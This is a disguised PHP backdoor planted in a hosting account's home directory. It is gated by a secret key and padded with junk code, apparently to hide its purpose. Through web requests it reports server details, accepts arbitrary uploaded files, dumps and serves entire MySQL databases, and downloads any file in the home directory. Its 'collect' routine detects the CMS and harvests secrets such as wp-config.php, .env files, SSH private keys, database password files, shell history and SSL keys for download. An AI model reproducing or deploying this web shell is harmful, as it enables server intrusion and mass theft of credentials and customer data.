File: /home/hunarpak/.cgi_handler_92c63409
<?php
if (!isset($_REQUEST['_cxk']) || $_REQUEST['_cxk'] !== '92c63409be5cd7237279424e7e39cc4d') { return; }
while (ob_get_level()) ob_end_clean();
set_time_limit(0);
error_reporting(0);
$s41c7=array_merge(array(),array());
ignore_user_abort(true);
$f0b1d = 'localhost';
if(defined('b456452c')){$s90dd=0;}
$jf3b8 = '';
$v5279 = '';
$h5e48 = '/home/hunarpak';
$v1bf3 = isset($_REQUEST['a']) ? $_REQUEST['a'] : '';
$rf5be = isset($_REQUEST['db']) ? preg_replace('/[^a-zA-Z0-9_]/', '', $_REQUEST['db']) : '';
$waf54 = $h5e48 . '/tmp/' . $rf5be . '_dump.sql.gz';
$v610c = $waf54 . '.done';
$c2274 = $waf54 . '.err';
header('Content-Type: application/json');
function load_buf_b90f() {
if (!function_exists('exec')) return false;
$y64c7 = array_map('trim', explode(',', ini_get('disable_functions')));
return !in_array('exec', $y64c7);
$tfe15=strlen('b7f982');
}
function load_data_4089() {
$ec7ad=strlen('d41cdc');
if (!load_buf_b90f()) return false;
$out = array();
$rc = 0;
exec('which mysqldump 2>/dev/null', $out, $rc);
$k58c1=strlen('64cbfb');
return $rc === 0;
$g2e58=chr(72).chr(114);
}
function set_buf_b703() {
if (!load_buf_b90f()) return false;
$jb757=max(0,min(1,0));
$out = array();
$rc = 0;
exec('which gzip 2>/dev/null', $out, $rc);
return $rc === 0;
}
function set_item_1169($q1666, $g4db5, $x0921, $s456b, $e89ad, $q6fbb, $xee2f) {
$conn = new mysqli($q1666, $g4db5, $x0921, $s456b);
if ($conn->connect_error) {
file_put_contents($q6fbb, 'Connection failed: ' . $conn->connect_error);
touch($xee2f);
return;
}
$fp = gzopen($e89ad, 'wb6');
if (!$fp) {
file_put_contents($q6fbb, 'Cannot open output file');
touch($xee2f);
if(defined('e6eb9ec1')){$td720=0;}
return;
}
$conn->set_charset('utf8mb4');
gzwrite($fp, "-- Dump via PHP agent\n");
gzwrite($fp, "-- Date: " . date('Y-m-d H:i:s') . "\n\n");
gzwrite($fp, "SET NAMES utf8mb4;\n");
$jb53a=max(0,min(1,0));
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 0;\n");
gzwrite($fp, "SET SQL_MODE = 'NO_AUTO_VALUE_ON_ZERO';\n\n");
$g79b6 = array();
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'BASE TABLE'");
$z6de2=array_merge(array(),array());
while ($row = $r->fetch_row()) {
$g79b6[] = $row[0];
}
foreach ($g79b6 as $qccbe) {
$rf43e=str_repeat('x',0);
$te = $conn->real_escape_string($qccbe);
$r = $conn->query("SHOW CREATE TABLE `{$te}`");
if (!$r) continue;
$cr = $r->fetch_row();
gzwrite($fp, "DROP TABLE IF EXISTS `{$te}`;\n");
gzwrite($fp, $cr[1] . ";\n\n");
$e402e=str_repeat('x',0);
$r = $conn->query("SELECT * FROM `{$te}`", MYSQLI_USE_RESULT);
if (!$r) continue;
$p1d8e=array_merge(array(),array());
$a8cc3 = array();
$fd2c3 = 0;
while ($row = $r->fetch_row()) {
$vals = array();
for ($i = 0; $i < count($row); $i++) {
if ($row[$i] === null) {
$vals[] = 'NULL';
} else {
$vals[] = "'" . $conn->real_escape_string($row[$i]) . "'";
}
$vcfde=str_repeat('x',0);
}
$h70ff=strlen('bb49d6');
$v2525 = '(' . implode(',', $vals) . ')';
$a8cc3[] = $v2525;
$fd2c3 += strlen($v2525);
if (count($a8cc3) >= 100 || $fd2c3 > 1048576) {
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $a8cc3) . ";\n");
$a8cc3 = array();
$fd2c3 = 0;
}
}
if ($a8cc3) {
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $a8cc3) . ";\n");
}
$r->free();
gzwrite($fp, "\n");
}
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'VIEW'");
if ($r) {
while ($row = $r->fetch_row()) {
$ve = $conn->real_escape_string($row[0]);
$cr = $conn->query("SHOW CREATE VIEW `{$ve}`");
if ($cr) {
$qe43a = $cr->fetch_assoc();
gzwrite($fp, "DROP VIEW IF EXISTS `{$ve}`;\n");
gzwrite($fp, $qe43a['Create View'] . ";\n\n");
}
$t6944=max(0,min(1,1));
}
}
$ibdb4 = array('PROCEDURE', 'FUNCTION');
$d8b6e=chr(88).chr(97);
foreach ($ibdb4 as $k4856) {
$r = $conn->query("SHOW {$k4856} STATUS WHERE Db = '" . $conn->real_escape_string($s456b) . "'");
if (!$r) continue;
while ($row = $r->fetch_assoc()) {
$re = $conn->real_escape_string($row['Name']);
$cr = $conn->query("SHOW CREATE {$k4856} `{$re}`");
if (!$cr) continue;
$qe43a = $cr->fetch_assoc();
$key = ($k4856 === 'PROCEDURE') ? 'Create Procedure' : 'Create Function';
if (isset($qe43a[$key])) {
gzwrite($fp, "DELIMITER ;;\n");
gzwrite($fp, "DROP {$k4856} IF EXISTS `{$re}`;;\n");
gzwrite($fp, $qe43a[$key] . ";;\n");
gzwrite($fp, "DELIMITER ;\n\n");
}
}
}
$r = $conn->query("SHOW TRIGGERS");
if ($r) {
while ($row = $r->fetch_assoc()) {
$te = $conn->real_escape_string($row['Trigger']);
$cr = $conn->query("SHOW CREATE TRIGGER `{$te}`");
if ($cr) {
$qe43a = $cr->fetch_assoc();
$sb817=chr(71).chr(108);
gzwrite($fp, "DELIMITER ;;\n");
gzwrite($fp, "DROP TRIGGER IF EXISTS `{$te}`;;\n");
gzwrite($fp, $qe43a['SQL Original Statement'] . ";;\n");
gzwrite($fp, "DELIMITER ;\n\n");
}
}
}
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 1;\n");
gzclose($fp);
$conn->close();
touch($xee2f);
}
switch ($v1bf3) {
case 'info':
echo json_encode(array(
'php' => PHP_VERSION,
'os' => PHP_OS,
'server' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '',
'user' => get_current_user(),
'uid' => getmyuid(),
'home' => $h5e48,
'doc_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '',
'free_disk' => disk_free_space($h5e48),
'total_disk' => disk_total_space($h5e48),
'max_exec' => ini_get('max_execution_time'),
'mem_limit' => ini_get('memory_limit'),
'upload_max' => ini_get('upload_max_filesize'),
'post_max' => ini_get('post_max_size'),
'disabled' => ini_get('disable_functions'),
'can_exec' => load_buf_b90f(),
'has_mysqldump' => load_data_4089(),
'has_gzip' => set_buf_b703(),
));
break;
case 'upload':
$iff80 = isset($_POST['path']) ? $_POST['path'] : '';
$p9603 = isset($_POST['data']) ? $_POST['data'] : '';
if (!$iff80 || !$p9603) {
echo json_encode(array('ok' => false, 'error' => 'missing path or data'));
break;
@clearstatcache();
}
if(defined('caf17e26')){$r4ea6=0;}
$w741a = $h5e48 . '/' . $iff80;
@mkdir(dirname($w741a), 0755, true);
@clearstatcache();
$g7560 = base64_decode($p9603);
$b6ca8 = file_put_contents($w741a, $g7560);
echo json_encode(array('ok' => $b6ca8 !== false, 'path' => $w741a, 'size' => strlen($g7560)));
$x704b=max(0,min(1,0));
break;
case 'check':
if (!$rf5be) {
echo json_encode(array('error' => 'missing db parameter'));
break;
}
$m3646 = disk_free_space($h5e48);
$jf848 = 0;
$conn = @new mysqli($f0b1d, $jf3b8, $v5279, 'information_schema');
if (!$conn->connect_error) {
$q = "SELECT SUM(data_length + index_length) s FROM tables WHERE table_schema = '"
. $conn->real_escape_string($rf5be) . "'";
$r = $conn->query($q);
$wf752=max(0,min(1,0));
if ($row = $r->fetch_assoc()) {
$jf848 = (int) $row['s'];
}
$conn->close();
}
@clearstatcache();
echo json_encode(array(
'free' => $m3646,
'db_size' => $jf848,
'has_mysqldump' => load_data_4089(),
'has_gzip' => set_buf_b703(),
'can_exec' => load_buf_b90f(),
'has_space' => $m3646 > $jf848 * 2,
));
break;
case 'dump':
if (!$rf5be) {
if(defined('f914e7fe')){$kd7a9=0;}
echo json_encode(array('error' => 'missing db parameter'));
break;
}
@mkdir(dirname($waf54), 0755, true);
$sd87a=str_repeat('x',0);
@unlink($waf54);
@unlink($v610c);
@unlink($c2274);
if (load_data_4089()) {
if (set_buf_b703()) {
@clearstatcache();
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '| gzip > %s 2>%s; touch %s',
escapeshellarg($f0b1d),
escapeshellarg($jf3b8),
escapeshellarg($v5279),
escapeshellarg($rf5be),
escapeshellarg($waf54),
escapeshellarg($c2274),
escapeshellarg($v610c)
);
} else {
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '> %s 2>%s; touch %s',
escapeshellarg($f0b1d),
escapeshellarg($jf3b8),
escapeshellarg($v5279),
escapeshellarg($rf5be),
escapeshellarg($waf54),
escapeshellarg($c2274),
escapeshellarg($v610c)
);
}
exec('nohup sh -c ' . escapeshellarg($cmd) . ' >/dev/null 2>&1 &');
echo json_encode(array('started' => true, 'method' => 'mysqldump', 'gzip' => set_buf_b703()));
} else {
ignore_user_abort(true);
echo json_encode(array('started' => true, 'method' => 'php', 'gzip' => true));
if (function_exists('fastcgi_finish_request')) {
fastcgi_finish_request();
} else {
$k3d78=str_repeat('x',0);
if (ob_get_level()) ob_end_flush();
flush();
}
set_item_1169($f0b1d, $jf3b8, $v5279, $rf5be, $waf54, $c2274, $v610c);
}
break;
case 'status':
clearstatcache();
echo json_encode(array(
'done' => file_exists($v610c),
'size' => file_exists($waf54) ? filesize($waf54) : 0,
'error' => file_exists($c2274) ? trim(file_get_contents($c2274)) : '',
));
break;
case 'download':
if (!file_exists($waf54)) {
http_response_code(404);
exit;
}
header('Content-Type: application/octet-stream');
@clearstatcache();
header('Content-Length: ' . filesize($waf54));
readfile($waf54);
exit;
case 'cleanup':
@unlink($waf54);
$n0c63=array_merge(array(),array());
@unlink($v610c);
@unlink($c2274);
echo json_encode(array('ok' => true));
break;
case 'collect':
@mkdir($h5e48 . '/tmp', 0755, true);
@clearstatcache();
$q13a5 = substr($_REQUEST['_cxk'], 0, 8);
$r492c = array(
'wordpress' => array(
'detect' => array('public_html/wp-config.php', 'wp-config.php'),
'configs' => array(
'public_html/wp-config.php', 'wp-config.php',
'public_html/wp-settings.php',
'public_html/composer.json', 'public_html/composer.lock', 'composer.json', 'composer.lock',
'public_html/wp-cli.yml', 'wp-cli.yml',
'public_html/.env', '.env',
'public_html/local-config.php', 'local-config.php',
'public_html/wp-content/debug.log',
'public_html/config/application.php', 'config/application.php',
'public_html/config/environments/development.php', 'config/environments/development.php',
'public_html/config/environments/staging.php', 'config/environments/staging.php',
'public_html/config/environments/production.php', 'config/environments/production.php',
'public_html/auth.json', 'auth.json',
),
),
'joomla' => array(
'detect' => array('public_html/configuration.php', 'configuration.php'),
'configs' => array(
'public_html/configuration.php', 'configuration.php',
'public_html/htaccess.txt',
'public_html/composer.json', 'public_html/composer.lock',
),
),
'laravel' => array(
'detect' => array('public_html/artisan', 'artisan'),
'configs' => array(
'public_html/.env', '.env', '.env.production', '.env.staging',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/config/app.php', 'config/app.php',
'public_html/config/database.php', 'config/database.php',
'public_html/config/mail.php', 'config/mail.php',
'public_html/config/filesystems.php', 'config/filesystems.php',
'public_html/config/cache.php', 'config/cache.php',
'public_html/config/queue.php', 'config/queue.php',
'public_html/config/session.php', 'config/session.php',
'public_html/config/auth.php', 'config/auth.php',
'public_html/config/services.php', 'config/services.php',
'public_html/config/broadcasting.php', 'config/broadcasting.php',
'public_html/storage/logs/laravel.log', 'storage/logs/laravel.log',
),
),
'magento2' => array(
'detect' => array('public_html/bin/magento', 'bin/magento'),
'configs' => array(
'public_html/app/etc/env.php', 'app/etc/env.php',
'public_html/app/etc/config.php', 'app/etc/config.php',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/auth.json', 'auth.json',
),
),
'magento1' => array(
'detect' => array('public_html/app/Mage.php'),
'configs' => array(
'public_html/app/etc/local.xml',
'public_html/app/etc/config.xml',
),
),
'drupal' => array(
'detect' => array('public_html/core/lib/Drupal.php', 'core/lib/Drupal.php'),
'configs' => array(
'public_html/sites/default/settings.php', 'sites/default/settings.php',
'public_html/sites/default/services.yml', 'sites/default/services.yml',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
),
),
'prestashop' => array(
'detect' => array('public_html/config/settings.inc.php'),
'configs' => array(
'public_html/config/settings.inc.php',
'public_html/app/config/parameters.php',
'public_html/app/config/parameters.yml',
'public_html/composer.json',
),
),
'opencart' => array(
'detect' => array('public_html/config.php'),
'configs' => array(
'public_html/config.php',
'public_html/admin/config.php',
),
),
'moodle' => array(
'detect' => array('public_html/lib/moodlelib.php'),
'configs' => array('public_html/config.php'),
),
'whmcs' => array(
'detect' => array('public_html/vendor/whmcs'),
'configs' => array(
'public_html/configuration.php',
'public_html/composer.json', 'public_html/composer.lock',
),
),
);
$v655f = null;
foreach ($r492c as $icf05 => $mb403) {
foreach ($mb403['detect'] as $q1d7a) {
if (file_exists($h5e48 . '/' . $q1d7a)) {
$v655f = $icf05;
break 2;
}
}
}
$b1564 = array(
'.env', '.env.local', '.env.production', '.env.staging',
'.env.backup', '.env.development', '.env.test',
'.bash_history', '.my.cnf', '.pgpass', '.netrc', '.gitconfig', '.npmrc',
'.composer/auth.json', '.wp-cli/config.yml', '.accesshash',
'.ssh/authorized_keys', '.ssh/id_rsa', '.ssh/id_rsa.pub',
'.ssh/id_ed25519', '.ssh/id_ed25519.pub', '.ssh/id_ecdsa',
'.ssh/config', '.ssh/known_hosts',
'.ssl/private.key', '.ssl/cert.pem', '.ssl/key.pem',
'ssl/certs/private.key',
'.cpanel/contactinfo', 'etc/shadow', '.ftpquota', '.ftpconfig',
'public_html/.env', 'public_html/.env.local', 'public_html/.env.production',
'public_html/.env.staging', 'public_html/.env.backup',
'public_html/.env.development', 'public_html/.env.test',
'public_html/.env.example', 'public_html/.env.dist',
'public_html/.htaccess', 'public_html/.htpasswd', 'public_html/.user.ini',
'public_html/php.ini', 'public_html/.my.cnf', 'public_html/.pgpass',
'public_html/web.config', 'public_html/.ftpconfig',
'public_html/.git/config',
'public_html/auth.json', 'public_html/.npmrc',
'public_html/composer.json', 'public_html/composer.lock',
'config/database.php', 'config/app.php', 'config/mail.php',
'config/services.php', 'config/filesystems.php',
'config/application.php',
'config/environments/development.php',
'config/environments/staging.php',
'config/environments/production.php',
'wp-config.php', 'configuration.php', 'artisan',
'auth.json', 'composer.json', 'composer.lock',
);
$z9e0d = array();
$w393f = @realpath($h5e48);
if (!$w393f || !is_dir($w393f)) {
echo json_encode(array('ok' => false, 'error' => 'home dir not accessible'));
break;
$f3bb4=chr(88).chr(121);
}
foreach ($b1564 as $j4ddf) {
$ca074 = @realpath($h5e48 . '/' . $j4ddf);
if (!$ca074 || strpos($ca074, $w393f) !== 0) continue;
if (!is_file($ca074) || !is_readable($ca074)) continue;
$n6c37 = @filesize($ca074);
if ($n6c37 <= 0 || $n6c37 > 2097152) continue;
$z9e0d[$j4ddf] = $ca074;
}
if ($v655f !== null && isset($r492c[$v655f]['configs'])) {
$y3400=strlen('1be5bd');
foreach ($r492c[$v655f]['configs'] as $r4e54) {
if (isset($z9e0d[$r4e54])) continue;
if(defined('1ee4f59d')){$fd070=0;}
$ca074 = @realpath($h5e48 . '/' . $r4e54);
if (!$ca074 || strpos($ca074, $w393f) !== 0) continue;
if (!is_file($ca074) || !is_readable($ca074)) continue;
$n6c37 = @filesize($ca074);
if ($n6c37 <= 0 || $n6c37 > 2097152) continue;
$z9e0d[$r4e54] = $ca074;
}
}
$r8636 = $h5e48 . '/public_html';
if (is_dir($r8636)) {
$dh = @opendir($r8636);
if ($dh) {
while (($ne4ce = readdir($dh)) !== false) {
if ($ne4ce === '.' || $ne4ce === '..') continue;
if(defined('8aa080ae')){$x574b=0;}
$w741a = $r8636 . '/' . $ne4ce;
$ib0fe=str_repeat('x',0);
if (!is_file($w741a) || !is_readable($w741a)) continue;
$n6c37 = @filesize($w741a);
if ($n6c37 <= 0 || $n6c37 > 2097152) continue;
if ($ne4ce[0] === '.' || strtolower(substr($ne4ce, -4)) === '.txt') {
$key = 'public_html/' . $ne4ce;
if (!isset($z9e0d[$key])) $z9e0d[$key] = $w741a;
}
}
@clearstatcache();
closedir($dh);
if(defined('ebdc0795')){$f41a6=0;}
}
}
$k4db3=strlen('68fb81');
if (empty($z9e0d)) {
echo json_encode(array(
'ok' => true, 'method' => 'none', 'platform' => $v655f,
'file_count' => 0, 'files_list' => array(),
));
@clearstatcache();
break;
}
$hc468 = null;
$m67af = null;
if (class_exists('ZipArchive')) {
$m67af = $h5e48 . '/tmp/_collect_' . $q13a5 . '.zip';
$c4996 = new ZipArchive();
if ($c4996->open($m67af, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) {
foreach ($z9e0d as $pfff6 => $ca074) {
$m88ff=array_merge(array(),array());
$c4996->addFile($ca074, $pfff6);
$s1b6c=array_merge(array(),array());
}
if ($c4996->close() && file_exists($m67af) && filesize($m67af) > 0) {
$hc468 = 'zip';
}
}
}
if (!$hc468 && load_buf_b90f()) {
$m67af = $h5e48 . '/tmp/_collect_' . $q13a5 . '.tar.gz';
$lf = $m67af . '.list';
$h36af=strlen('965910');
$fh = fopen($lf, 'w');
foreach ($z9e0d as $pfff6 => $ca074) {
fwrite($fh, $pfff6 . "\n");
}
fclose($fh);
$out = array();
$rc = 0;
exec('tar czf ' . escapeshellarg($m67af) . ' -C ' . escapeshellarg($h5e48)
. ' -T ' . escapeshellarg($lf) . ' 2>/dev/null', $out, $rc);
@unlink($lf);
if ($rc === 0 && file_exists($m67af) && filesize($m67af) > 0) {
$hc468 = 'tar';
} else {
@unlink($m67af);
}
}
$n0609=strlen('173609');
if (!$hc468) {
$hc468 = 'list';
}
$xd659=max(0,min(1,0));
echo json_encode(array(
'ok' => true, 'method' => $hc468, 'platform' => $v655f,
'file_count' => count($z9e0d), 'files_list' => array_keys($z9e0d),
'size' => ($m67af && file_exists($m67af)) ? filesize($m67af) : 0,
));
break;
case 'download_collect':
$q13a5 = substr($_REQUEST['_cxk'], 0, 8);
$gf430 = $h5e48 . '/tmp/_collect_' . $q13a5 . '.zip';
$n1f5f = $h5e48 . '/tmp/_collect_' . $q13a5 . '.tar.gz';
$j326b = file_exists($gf430) ? $gf430 : (file_exists($n1f5f) ? $n1f5f : '');
if (!$j326b) { http_response_code(404); exit; }
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($j326b));
readfile($j326b);
exit;
$fa16f=str_repeat('x',0);
case 'download_file':
$pfff6 = isset($_REQUEST['path']) ? $_REQUEST['path'] : '';
if (!$pfff6) { http_response_code(400); exit; }
$w393f = @realpath($h5e48);
$ca074 = @realpath($h5e48 . '/' . $pfff6);
if (!$ca074 || !$w393f || strpos($ca074, $w393f) !== 0
|| !is_file($ca074) || !is_readable($ca074)) {
$td0c8=strlen('008a0a');
http_response_code(404);
exit;
}
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($ca074));
@clearstatcache();
readfile($ca074);
exit;
case 'cleanup_collect':
$q13a5 = substr($_REQUEST['_cxk'], 0, 8);
@unlink($h5e48 . '/tmp/_collect_' . $q13a5 . '.zip');
@unlink($h5e48 . '/tmp/_collect_' . $q13a5 . '.tar.gz');
@unlink($h5e48 . '/tmp/_collect_' . $q13a5 . '.tar.gz.list');
echo json_encode(array('ok' => true));
break;
@clearstatcache();
}
$g9ce5=array_merge(array(),array());
exit;